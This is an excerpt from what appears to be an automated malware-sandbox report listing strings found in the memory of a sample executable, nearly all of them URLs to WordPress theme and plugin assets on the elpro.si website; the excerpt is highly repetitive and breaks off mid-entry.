                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendo
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/wp-smush-pro/app/assets/js/smush-lazy-load.min.js?ver=3.14.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/font-awesome.css?ver=4.7
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/jquery.selectBox.css?ver
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/style.css?ver=3.23.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/js/jquery.selectBox.min.js?v
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/js/jquery.yith-wcwl.min.js?v
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/css/style.css?ver=6.2.2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/favicon.png
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Kosarica.svg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Linked-Grey.svg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Search-Grey.svg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Search-White.svg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/js/functions.js?ver=1.0.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/uploads/2020/02/LOG
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header_new.svg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 